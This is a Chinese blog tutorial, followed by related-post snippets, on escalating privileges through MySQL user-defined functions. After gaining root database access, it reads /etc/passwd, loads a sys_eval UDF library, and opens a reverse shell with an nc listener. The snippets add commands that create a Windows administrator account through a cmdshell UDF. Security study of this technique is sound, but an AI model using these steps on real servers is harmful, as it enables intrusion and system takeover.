mysql udf禁用_Mysql数据库提权:浅谈UDF的安全问题利用

最新推荐文章于 2024-04-25 20:47:12 发布
最新推荐文章于 2024-04-25 20:47:12 发布
阅读量178 收藏
点赞数
文章标签: mysql udf禁用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42157567/article/details/113159494
版权

一直比较关注服务器安全问题,最近和一个朋友探讨mysql的利用UDF提权问题。我们攻陷一个网站的时候拿到root密码,有时候不仅仅看看数据库,还可以做其他事情,甚至服务器提权哦。

譬如, 执行一条sql语句查看/etc/passwd文件的内容:

f10332135071e0795b5b1ad263a21561.png

这里主要是用到了load_file()函数,当然这个函数是可以被禁用的。以上可以轻松看到/etc/passwd文件的信息和ip地址,当然其他的文件内容都可以被看到。

由于load_file()函数只能实现类似系统命令cat的查看文件功能,但是想执行系统命令的功能,那么只能用UDF了,也就是User defined Function,用户定义函数。

查看mysql的plugin,plugin_dir的路径为/usr/lib/mysql/plugin

0169db7bcb18a0d5dee1d04cab25d162.png

如果像我遇到这个数据库服务器一样,plugin_dir的路径为空也无所谓了。

71fe8117ad5b836ba9f1951ea34f775b.png

执行以下sql语句,把udf.txt里面的十六进制的文件内容导出到/usr/lib/mysqludf.so

fe17040655e7c867ff1434168413aa2b.png

查看下这个udf库所支持的函数

03d736c9fb1da273189a65d0ae74f341.png

创建函数并且查看是否创建成功,可以看到一个名叫sys_eval的UDF创建成功了。

c473a784ff992d0eeae02f04db21b73b.png

最后利用UDF执行更高权限的功能

e9735700b994a89c4b9681b1cf70544a.png

剩下的就用这个UDF获得系统权限吧,提示可以用nc反弹,在自己的主机上执行nc -vv -l -p 12345,在数据库上执行一下sql语句

5303358f4be84133d1ed353fc3fb455d.png

就可以成功反弹出linux shell了,再往下就。不过UDF的利用也有局限性,需要有mysql库的操作权限,在mysql库下必须有func表;在skipgranttables开启的情况下,UDF会被禁止。

PS:mysqludf.so是我已有的一个库文件,利用它生成了udf.txt,执行以下sql语句即可

mysql> select hex(load_file('/usr/lib/mysqludf.so')) into outfile '/tmp/udf.txt';

Query OK, 1 row affected (0.04 sec)

缪建明
关注
详解MySQL information_schema数据库常用的表信息以及各表对应的字段信息;以及如何登录mysql和创建视图
念兮为美
07-20 4775
详解MySQL information_schema数据库常用的表信息以及各表对应的字段信息;以及如何登录mysql和创建视图。我们常用的information_schema数据库中的表,比如TABLES,SCHEMATA,COLUMNS,CHARACTER_SETS,KEY_COLUMN_USAGE等,这些在我们的开发中非常重要,值的学习和研究。...
服务器关于MySQLudf.dll 提权入侵处理方法
CShouziwangDN的博客
04-18 370
处理服务器关于MySQLudf.dll 提权入侵处理方法 首先在服务器桌面创建一个.TXT文件,名称随意,然后复制下面代码保存,最后修改.txt的扩展名为.bat文件,双击运行.bat文件即可。 批处理代码: net stop mysql del %SystemRoot%\system32\udf.dll /A/F/Q del %SystemRoot%\udf.dll /A/F/Q del %SystemRoot%\temp\udf.dll /A/F/Q dir %SystemRoot%\system32
MySQL8.0.16 兼容加入组_新特性解读 | MySQL 8.0.16 组复制通讯协议的设置
weixin_31782201的博客
01-27 123
背景在上一篇推文中,我们介绍了 MySQL Group Replication 8.0.16 支持信息碎片化功能来增强大型事务处理能力。如果您想在组复制中使用该功能,则任何组成员的版本都不能低于 8.0.16!简单地说就是由于低版本协议上不支持。MySQL 8.0.16 的组通讯开始支持新协议,简称“分段协议”,之前的版本中只有一种“压缩协议”。如果多个成员想加入复制组,那么在协议匹配上遵循以下原...
mysql udf禁用_关于mysql udf权限的问题
weixin_30461595的博客
01-18 174
昨天在服务器上执行mysql udf函数sys_exec和sys_eval都很成功,今天重启了一下服务器 打开mysql 用exec执行任意命令都是返回32512 对应linux的127 也就是无权限或者路径错误..想问一下怎么解决,怎么给udf函数赋予权限啊?我用的是 lib_mysqludf_sys version 0.0.3/*lib_mysqludf_sys - a library wit...
Mysql数据库UDF安全问题利用
weixin_34319111的博客
10-06 105
最近一直在休假,没有写博客,转眼十一还剩最后一天,时间真的很快。今天想谈谈数据库安全问题。 对于数据库安全问题,首先,重要的生成库千万不能放在公网上,一旦被******后果不堪设想,轻则数据丢失,重则被***(整库被打包导出),如果恰恰又以明文存储了用户的密码,那么就太可怕了,去年轰动一时的某几个大型网站的用户数据泄漏事件都是因为明文的方式存储了用户的密码。其次是大量...
python os模块中常见的方法和使用
re_call的博客
09-14 291
os.remove() 删除文件,比如os.remove('file'),file必须是文件。 os.rename() 重命名文件。os.rename("file","file1"),会把文件file改为file1。 os.walk() 生成目录树下的所有文件名。 os.chdir():改变目录 os.mkdir/makedirs:创建目录/多层目录 os.rmdir/removedirs:删除目录/多层目录 os.listdir():列出指定目录的文件 os.getcwd():取得当前
MySQL提权的两种方式_利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_30365269的博客
01-28 1216
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
mysql提权udf
09-20
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
在网络安全和渗透测试中,权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
mysqludf提权
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...
mysql存储过程与存储函数_MySQL的存储过程和存储函数UDF)的区别
weixin_42127754的博客
01-18 98
现有复制组成员和新加入成员版本相同,加入成功。低版本成员想加入高版本的组会被驱逐,加入失败。高版本的成员想加入低版本的组,单独加入成功,多个加入失败。例如:一个 MySQL Server 8.0.16 实例可以成功加入使用通信协议版本 5.7.24 的组。一个 MySQL Server 5.7.24 实例无法成功加入使用通信协议版本 8.0.16 的组。两个 MySQL Server 8.0.16...
mysql udf安全_mysqlUDF引入的安全问题
weixin_34790081的博客
02-01 135
一个测试库,由于之前部署的时候没注意它有公网地址,因此密码也设得比较简单,直接把root密码设为123456,没想到很快就被扫描后登进去了,还建了一个用户,试图利用mysql udf取得机器系统权限。如下:108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf.so'108883 Query CREATE...
数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 2065
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
linux环境下的MySQL UDF提权
最新发布
黑战士的博客
04-25 1676
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
mysql udf提权
weixin_44580111的博客
06-24 1029
一次mysql提权的历程
防止mysql提权_mysql提权总结方法四则
weixin_28679635的博客
01-19 466
UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:create function cmdshell returns string soname 'udf.dll'select cmdshell('net user iis_user 123!@#abcABC /add');select cmdshell('net localgroup administrators iis_u...
MySQL提权UDF提权(附带大马)
07-25 1799
Mysql提权UDF
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值